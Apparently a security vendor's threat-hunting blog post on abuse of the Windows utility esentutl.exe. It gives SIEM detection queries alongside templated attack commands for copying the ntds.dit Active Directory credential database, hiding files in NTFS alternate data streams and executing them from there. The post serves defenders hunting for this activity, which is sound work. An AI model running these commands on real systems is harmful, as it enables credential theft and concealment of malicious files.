Threat Hunt Deep Dives: Living Off the Land (LOTL) with Esentutl.exe

Cyborg Security
2 min readOct 28, 2021

--

By Lee Archnial at Cyborg Security

In this Threat Hunt Deep Dive, we focus on the Living Off the Land Binary (LOTL) Esentutl.exe. Designed for running tasks and operations related to databases and database files, this executable can abuse the NTFS file attribute Alternate Data Streams (ADS). Using different techniques, threat actors can hide files in these streams to accomplish different goals such as tool infiltration and data exfiltration. Esentutl.exe also has the ability to extract the ntds.dit file from a Shadow Copy, which provides the attacker with information related to the Active Directory environment, to include usernames and password hashes. By combining these techniques together, the adversary can infiltrate the network, take what they want, and get keys to the kingdom using one tool.

Queries

1st Hunt Query:

Event_ID=4688 AND Process_Name=*esentutl.exe* AND (CommandLine=*/y* OR CommandLine=”*:*” OR CommandLine=”*/d*”)

2nd Hunt Query:

Event_ID=4688 AND Process_Name=*esentutl.exe* AND (CommandLine=*/y* OR CommandLine=*/p* OR CommandLine=*/vss* OR CommandLine=*/d*) AND (CommandLine=*AppData* OR CommandLine=*C:\Public* OR CommandLine=*C:\Users* OR CommandLine=*C:\Perflogs* OR CommandLine=*C:\Windows*)

3rd Detections Query:

Event_ID=4688 AND Process_Name=*esentutl.exe* AND CommandLine=*/vss* AND CommandLine=*ntds.dit

Commands

Extract NTDS.dit file:

esentutl.exe /y C:\Windows\NTDS\ntds.dit /d C:\[PathToSaveFile]

Hide a file in alternate data streams:

esentutl.exe /y C:\[PathToFileYouWantToHide] /d C:\[PathToFileYouAreHidingItIn]:[NameYourAlternateDataStream]

Extract a file:

esentutl.exe /y C:[PathToFileWithHiddenData]:[HiddenDataStream] /d C:\[PathWhereToSaveFile]

Powershell Command to view data streams:

Get-Item -path [PathToDirectory] -Streams *

Powershell Command to view content of hidden stream:

Get-Content C:[PathToFile] -stream [NameOfHiddenStream]

Execute .exe out of alternate data streams:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\[PathToFile]}

References:

NTDS File cracking:

https://bond-o.medium.com/extracting-and-cracking-ntds-dit-2b266214f277

IRed.team:

https://www.ired.team/offensive-security/defense-evasion/t1096-alternate-data-streams

LOLBins:

https://lolbas-project.github.io/lolbas/Binaries/Esentutl/

Att&ck Mitre:

https://attack.mitre.org

--

--

Cyborg Security

Cyborg Security is a pioneer in cybernetic threat hunting, delivering an advanced, actionable threat hunting platform.